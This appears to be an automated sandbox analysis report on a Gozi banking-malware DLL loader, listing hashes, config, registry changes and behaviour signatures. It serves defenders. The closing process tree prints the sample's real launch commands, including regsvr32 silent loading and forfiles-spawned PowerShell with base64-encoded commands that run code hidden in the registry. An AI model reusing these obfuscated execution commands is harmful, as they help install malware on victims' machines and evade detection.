Analysis
-
max time kernel
153s -
max time network
166s -
platform
windows7_x64 -
resource
win7-20220331-en -
submitted
07-04-2022 14:56
Static task
static1
Behavioral task
behavioral1
Sample
crypted_loader_dll_64Donat_5.dll
Resource
win7-20220331-en
General
-
Target
crypted_loader_dll_64Donat_5.dll
-
Size
151KB
-
MD5
55ab2f304f8c2da30aeee7713a95064d
-
SHA1
aae939cf3995905399e427097fc90c5b62f3d4c3
-
SHA256
41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547
-
SHA512
08bbf78b4154f725399055dfb8a4338ce873297af847a5e30c8b6708e44feeae071fbf7efff9ff2c0b397fdffec5ca52a9591f742092a8f50287e54ce89307d3
Malware Config
Extracted
gozi_rm3
-
build
300994
Signatures
-
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c000000000200000000001066000000010000200000005f374843cd3d24a75cdfce9c69c64e754e1164bcd1c5c69d8c307febcba85d19000000000e80000000020000200000002c60843e09f663df1ccd5966573ed9fa09d12f118f435d896ee81cf52fb6da143001000016eba7a53baff356d3c0c5f05820878261dd5cb4c914372e26e025a0a1bd40be0cee540fbbaa503c5931336c9ce3c709daaff9819f0934c77278c772b4990fdaa4bbb5df725507fd215852caa2e8702cf47ca0496107f8ee599e895a939ffe086caefa4329152c4103f69d35ae0518d9a148a9fd7bdfaa31892e327241b01501ee5dd5b21669072cafa98d122162159f61caf56aff2bdb7edea5f236e7b34715e59a54adbbe80b57ada4b3beefb2ba2a0545e54f4d44444e1743e1b5da63d6816c88d7f9480d499e94885af28a56d04ed1a96a38cf571414cfe067e0340cc52f0ac0682ee5a2a8b599068e46b7c40fadc564388dbaa645562cf40af383a1195b7fed03cb356999371c9c42e407564feaaee6342f95cf3467d3cf47f9ca3a903714cd02c45c9976e769aa216171b6243f4000000014b626f79ae4fa9b85a2d9d6f72ecde2c7e4283f7df1f9518d2d9f52726f40232dbf256a12ca4163e6c04e1b7ecdd129ddc3dbfa3184e111f3766268189bd7b4 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c00000000020000000000106600000001000020000000020b435d9237046e0e6c948f915ec8f5b5b53e96624482283d31258f16e7c690000000000e80000000020000200000004e819c2888c9f1cc541bfff2ea5875e91635bb2541abc8d4e474a4ac6a804876200000009c73ae42931a56e8caa19ad152d381091320f8b6222b311aa7eb2713e3b29baa40000000c1bfbb5e1e068e8d2bda8db42933bf0768fe670bd306933c1406ed515737fd63a23d736a2e56409aba654c9012322fcd4d84a995096b20ae5d654988099e1d19 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c000000000200000000001066000000010000200000002702c137094c09f24454f67af6b1ac1ba5b9afda789f3bae44fa590d2625880f000000000e800000000200002000000016d5b741fe6a95c14f261c5cbe399b3800b16a39e788e1fbef631bbe315f170990000000530297a3e148204c0aa168af4a7ad16520d1e83f83897e207fd38123a7569e147b0312379d590480faa2b71732ae7d38dfb45ce42042dc4eabb719562750eccbd370ea9992d6b091027fda2c6cf5752262d5a6431e59406fb0008f66ebe14c81dbe2840e5a74c2517f347e0a9d03e8cb70ea6195a6f3606bfe3bb3ff0f00ad56f10ce95f987ceba8bd61aece621166b840000000a33b80d69beddf0f4f662245657cd10b5c6876795d50c7e635ccf8fca629ed4313c0a920e69e6b11f7ddd46c2619ae281c487b3928c3f843cee217e259aac0a6 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c00000000020000000000106600000001000020000000d4899c64909c16dbb1022ed09aa45bb4498c6fc7d520a41e4b70b7d59f95e1cc000000000e800000000200002000000034aa955d24165a69ce1fceaa96b3938a99e8e9e54563962331f54b48f652ea7330010000bde00caebb73b2673c764172e99d79b9cae3f5042af160a54d18f23055893303a07639bebe7922785ea742ad2d601b247f3fc05b9ae75d0fad440ca543780923fca06dbc641ce20f60632df028272878b0477ae20468ebf200a9bcee7c65d7ef97679f2397f008f46b0a34c8329fe92302e2bea93e5d0cac7ff80918e20fa40c17d04feea13d6d477fb5b490e70059d98b46e6de323b70e7054c226410ede9982f8d4f5228c6e51e129a4448d0a22d1b69a20ead9e992c8c8967db13ae38e6017a404b728bceacde8081087cf37661a5b7ffe1a2948483f4871ba4c259695e4d144ea4948bbd9d5de91f8e809c6fadf84866379f2f64ed5ed23f8c203d3b3483a6781a44848e537ca9a51a11574e48b9cfc60e7e3a79c7f8a8932b38d46468928c2ab02f59179277a637b020547814d6400000009d7b9c10bf6c781dea8a7a1fd0fa976eb026a96b33a2f059490c40adc9ac3f1819082683ed4453be4383f9540038a08f57b208c85610e8e2dd152a2571c223b7 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c00000000020000000000106600000001000020000000f6cc686f3da692e94ea08e4ac1b485d42a12f086266144a1133ce7b16e6aec9b000000000e8000000002000020000000b7e824a53dcdbe6ce73c35bf179ec9d1ed85dddb2fb7343a193cea23ca983b5e3001000027eb338058a8641df6f38c3af88cf29d2cb296da765d16632ea6440f01764b74b70efa1d41494b776d0907503bb8d3b0db4b589f9b137057e89bf64adf71e68900e7191d8fe30707bedd65359a16ff631abfc18c044061def1227d1cb97363e1ec5d6131c6bce796a84ccfa1d1766c889ef08ba318bef435ad361bea1c484b74bf918b4be0a2b616973489abce4304eff0baaee697872c86d197b64874b26d781263d592ec0fa29d7423f730dc59ba6fc5ac707fc52378a7bbe0542b573b7493ba0bf4ab14c2a599d97df5accc691f02701985a5ee186959c2f9b8510c5840c02f943156ca70e5731616c1ac18eb1467fe821f8a6d8d07d870351c180555356e4e696851501d9a9f5b57d47d509f8232c698ea4586c3036651ffe7658e1f19f293a0556e1dd4e57f68b86a6f439fe08540000000d9d14e221831c7e793cab8a7f6ff5ead63c1cb964eb35d3c983680f318e2d017d0cbbae4de281b17b01f8bea4cbe8c876eaa44b8b8006e5113decba46c44f9a7 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c0000000002000000000010660000000100002000000003b9c2124279dcd4bfade6539bbd6f4e8ca6ad3e4566b2bc96f9e0844d90e6e7000000000e80000000020000200000006793214077fe12e6b114887c866e43f8a893054311143e3e2878318011517ff630010000dd5551c52c155264a199a9bea0a03c30f55f266d5ee35984834455335b303b79ad9282b5769c3d88a9c989649b605f6210e7ce2ae26053bbb271e16c95a45580d62235e3cd631920f48c701afd1eeb0856890e8322fad8b2ca7cc107c1c4e94dd6eec6926d59eacd7872ae4f7dcd8341415d6d106987b666e9589d5887c8cf2a7d5def4e23d90fea2f86c3d8f7520f39460968b5bc55942c66c1b52f872d5d6a4f045121f8f96517aec75a8d9a6dc804407ce4fc7cd79b2f6f6fedcd68c10d6a58a72e25a9d00393a1287ad6bdfac5421c81ee2d4c9bf5196fb11c705b9ca169c4e2022b21b289a3a69bba638e6e7884e279c0491893d10eb66306d6ac0197bcfc8c4a50dcf780f072678da6fbff3df5d43996120b11cbcb7ddcc01efc219588c46a4c2b19c44a217f6f02a2f7e75760400000008284e5ae95729f1ccc57c144251e1759afc79325bc02d76ef7064d8f7729a045a3a5c6485b3380c74604dddf332b3a297141e3cb8d8d23fc570d45b8cec40e68 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c000000000200000000001066000000010000200000007bf8bac77c48b1df7b41dae308ee0f8f3ec955412057c4a5ff3da5bed4493799000000000e8000000002000020000000b216f03f996e2676a7137e459f1d194634fd7550193a487d534c22547bc5e63b30010000c677a36bec7464c0e567c7847b8691bc7099b3d3e813a4fcee050a09fd30b759812fe7bd33102fe7f74bf644c1679cc3340de695a1e004473ef52821506184642d8b0dd9fd23addce9953490df82f553ea4f5a21ec4b48cf490e75ce6ac5d60e153bb8924782fe80109e6e152e55e32ea1ec8fd0c4b51d5d35096d8fe5f109168ebb0c0ab39925c04a76847ef814895aaa3ec5cde6262448094f9292e7d3b9bb49881c09b1fdfdff3cf32d5594daae9b09a57dfdb63009137cf1e789b54a9878dc779733d4e03148b7e22c32c5d53ac63354aa82c3e465728c5a7116249f9aa0f37aeda39889930bb000f521b7c162d6f9a9ea875e3f54273abac23fefb07c347701c80317f4fe8946adfba8e22b808c99d738d22eec5e61598f965c5997d82070b1d03a9af78221c4ece5591651e790400000009fae953d270bf8b10b70d123fb609eb91152b776a3b702e856837169b3c119ec5775c89dbfa2c01a73b3e4f1331f46cd7796af5a45b4bef3db85c064861fc432 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c00000000020000000000106600000001000020000000609a3280b3181b5f3dce7004ce0e9f61024c5bb34f41706e8f0dd6dcd649cee8000000000e80000000020000200000004760f3f0dde26d04dcb05ac57bdc4f3adcc3631669c00ea2b5cd5828a71554c930010000b64efc8c3681e0dbcaf5bc74cb8a1b9abae1dda31315d3af868d5e2b7bd7b610d106090f48239247cd96e69b5723e3a2a96ff18df24b041a24ee0b1db1417fe3fa9b0968d2d8ada413de3052b8c95685785aba339a025a5347bf60361b5e3a9e14c9e58b03cd7e80035c58c6098fb320903b7d5a1fe29022eee3fd0690061ce7810440d06cb6a1551e612bee5636bda1771412e996de6826794ea65f67c3961a1b21454d676e49c59f403c70dcb9d4dbd733d71d800f602ed77895153fd55a81989fe79a398ac6cb7123abab6cc41afeeb40d1c40d37998a0ed5213cf812a5b5e500b713ffe8ea13e007898790b0ea6b0fd4ce329dd89372112ffa5a12e535b6d18616fbbab6ba8e38987e3b5b5bc85f8c673a04981043593c2181fa0dc94f7a992b34726412a55f602c29ff8d9b14fe400000003784fabff4d136cad8dfafa470146f681a6d62e3f27b04b97acac78d0fb46a0afe786ad92056c1563efcfae873d108f70f3441d4c033e242b5484e87859200df iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c00000000020000000000106600000001000020000000c244ae7d2e457a04728c52c2f01aa539765a938d8fb6dc8d6abd0dfcc6a836e1000000000e8000000002000020000000587980a3a52e5ffdd4b0948473f33697d9e64cc0a09d2f9a8e1532d4b10aa3743001000020ea28f3f08303d60e4f0069b8bdde52ca8835ab512a0e3dabf088cc308e86cb532b7f1f18517e3605106d79d7b21874ab077a5ad1272cb100b18993584ca220811fb30b8a9c330d9a4865e76212801324bddb9fee5c4ce2d6763fb13ceab346bdbb897ad5515e52849b4f80399f87353acdff7dff6095d1f474b5cf8272547b354deac83147ed6376e4b4128bb8259ab1cfe985bfd76760f1d3362233567f71778605e0867fd5f228805620cbf144da3ebec0a3f490f08d16f30022e55ac464fdc4d1244a6a58cd5f2aa74f5d5d77f58f570d5dacca4682906e4e212adf7ad969b31144fe022337129034ffce375a46c9cdf99009b3034640aafafb69808bebf61d8c937e0f190672c1361dfb0fdad1c50e8ea9d36b5fb7153dfb78defe25468310edf54e7066f29b97e9666f69d1ba40000000a81445782fdb11963526b26b477fe283c438790228f5b372f4e48c55f1e703798d1ce7b116778786152d2b4ae0aa58d459c694686023b419d3b6bc7ac84d9008 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c00000000020000000000106600000001000020000000918a725039934c909cd4d6998a503ab31673046f5ec41755cc63ae6971cc9de1000000000e80000000020000200000000ff4724761dc2629714d67f12cab5f951bfdfd1efd2cb67d7588749938cbfb9e30010000bd44c9943f64b4022311200325b68f06e0e99e31ed08f8881091e718acd7e154edbf804104cdcb29de32316f2932b86653262cc1d6b8843db42684c7f7d8bdcfb36d8d3e6145b9b530fa578a585addebfb020d01c47794148d8e8323a710bf0684f660b194a04f56d249f7a7e012252a265af16565615a90f3f78d75aa5f41a8599b130010293ded34426f67cf32d7bf9b4cc23fd98f4d7b8a2b3faf5f879e2b2a7600c0a8264125b9d10afca65639ea7deea4ff7d0f1cbab60ae6b7152af38842920913dfd356df2ab1ce798f98d6d9c45e0144f7787e1fe998aea4c0f53a0109b0caa8b5f5a00b188efb2cea0e286fe3b38d8b4a76e9e537420a7ef3defb69a41246dfffc6d9a45a5afbda4051a9afffea749ae99d0ebf261789935327a0d8d7707cd5880515525b39daa819cecb1c40000000755e552ac3e8e5a2a332ed25c3521600cb4257eb0a0a2050567b837163126de16e3d0ade5fee562ec033bed702b9bdaf506ff4e9b6d23755e9b1e8c6b3c7cad1 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ac970f6e21c8045b4ad45959768992c00000000020000000000106600000001000020000000b9157ff64de208341feeb8365e2e34b6aa3d62b6b59a1f2ebebee404be68b8cd000000000e8000000002000020000000e9b77fa3b026c9c2be35ec601559411d51f519e8896a8889dad7362aba8388e830010000223d665d8e0c49e7741b3bcdab1cfc0124d48a61302c7531d78ad2af65c7f16295f605975c2df247266f622b61a1862bc217eb1edcd7f274765dae1f34a45226dd2c09691e7bb47575eef70a3cf79c26b45be0fbb211283e346c0ff8374098817163dbaf92228efc1d3a86670e48167514201c038b7326a58ce0b1025e91667f6cdfd3969e6142924b21db1cd0108d0fc942ea96c34f4aa50d9a0e2f9caad31bb2f71bb74d22d55a4d59ca7b9d6694bb27b79f477fee9f0ddcb64984e7e11b9cf28fd5f9fa5f4f598c3ad25610cca009bd584e9d4a4ec48963c82b2b9076e66cb99a77a89b9adc439c7f96a840027394dde3b86de2e266f5dffe361894b97a402830ed06262a30029a80766f2e86fe70a69c3aea8418f690a6c0df498dcd113ccbcb4041ec7a626f23a550469c727c87400000003c5b73d0964297f7360e8404998e8c19e885234922ad7224497195258488061324ef2baa50e8b1f2fb1c7f2b42402467ac1e36bc7d6afeb65208db8d4a3267c0 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C8FFBDF1-B693-11EC-B013-5A2FF6439102} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-594401021-1341801952-2355885667-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0db1d93a04ad801 iexplore.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1152 powershell.exe 568 powershell.exe 1676 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1152 powershell.exe 1404 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
pid Process 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe 1868 iexplore.exe -
Suspicious use of SetWindowsHookEx 44 IoCs
pid Process 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 960 IEXPLORE.EXE 960 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE 1868 iexplore.exe 1868 iexplore.exe 1580 IEXPLORE.EXE 1580 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 1212 wrote to memory of 1404 1212 regsvr32.exe 28 PID 1212 wrote to memory of 1404 1212 regsvr32.exe 28 PID 1212 wrote to memory of 1404 1212 regsvr32.exe 28 PID 1212 wrote to memory of 1404 1212 regsvr32.exe 28 PID 1212 wrote to memory of 1404 1212 regsvr32.exe 28 PID 1212 wrote to memory of 1404 1212 regsvr32.exe 28 PID 1212 wrote to memory of 1404 1212 regsvr32.exe 28 PID 1868 wrote to memory of 1580 1868 iexplore.exe 34 PID 1868 wrote to memory of 1580 1868 iexplore.exe 34 PID 1868 wrote to memory of 1580 1868 iexplore.exe 34 PID 1868 wrote to memory of 1580 1868 iexplore.exe 34 PID 1868 wrote to memory of 960 1868 iexplore.exe 36 PID 1868 wrote to memory of 960 1868 iexplore.exe 36 PID 1868 wrote to memory of 960 1868 iexplore.exe 36 PID 1868 wrote to memory of 960 1868 iexplore.exe 36 PID 1028 wrote to memory of 1116 1028 cmd.exe 39 PID 1028 wrote to memory of 1116 1028 cmd.exe 39 PID 1028 wrote to memory of 1116 1028 cmd.exe 39 PID 1116 wrote to memory of 912 1116 forfiles.exe 41 PID 1116 wrote to memory of 912 1116 forfiles.exe 41 PID 1116 wrote to memory of 912 1116 forfiles.exe 41 PID 912 wrote to memory of 1152 912 cmd.exe 42 PID 912 wrote to memory of 1152 912 cmd.exe 42 PID 912 wrote to memory of 1152 912 cmd.exe 42 PID 1152 wrote to memory of 568 1152 powershell.exe 43 PID 1152 wrote to memory of 568 1152 powershell.exe 43 PID 1152 wrote to memory of 568 1152 powershell.exe 43 PID 1152 wrote to memory of 1676 1152 powershell.exe 44 PID 1152 wrote to memory of 1676 1152 powershell.exe 44 PID 1152 wrote to memory of 1676 1152 powershell.exe 44 PID 1152 wrote to memory of 1604 1152 powershell.exe 45 PID 1152 wrote to memory of 1604 1152 powershell.exe 45 PID 1152 wrote to memory of 1604 1152 powershell.exe 45 PID 1604 wrote to memory of 1080 1604 csc.exe 46 PID 1604 wrote to memory of 1080 1604 csc.exe 46 PID 1604 wrote to memory of 1080 1604 csc.exe 46 PID 1152 wrote to memory of 832 1152 powershell.exe 47 PID 1152 wrote to memory of 832 1152 powershell.exe 47 PID 1152 wrote to memory of 832 1152 powershell.exe 47 PID 832 wrote to memory of 1248 832 csc.exe 48 PID 832 wrote to memory of 1248 832 csc.exe 48 PID 832 wrote to memory of 1248 832 csc.exe 48 PID 1152 wrote to memory of 1268 1152 powershell.exe 16 PID 1404 wrote to memory of 1268 1404 regsvr32.exe 16
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1268
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\crypted_loader_dll_64Donat_5.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\crypted_loader_dll_64Donat_5.dll3⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVwBlAGIAZgBhAGwAcwBlACcAKQAuAEMA & exit" /p C:\Windows\system32 /s /m po*l.e*e2⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\system32\forfiles.exeforfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVwBlAGIAZgBhAGwAcwBlACcAKQAuAEMA & exit" /p C:\Windows\system32 /s /m po*l.e*e3⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\cmd.exe/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVwBlAGIAZgBhAGwAcwBlACcAKQAuAEMA & exit4⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVwBlAGIAZgBhAGwAcwBlACcAKQAuAEMA5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQAnAA==6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
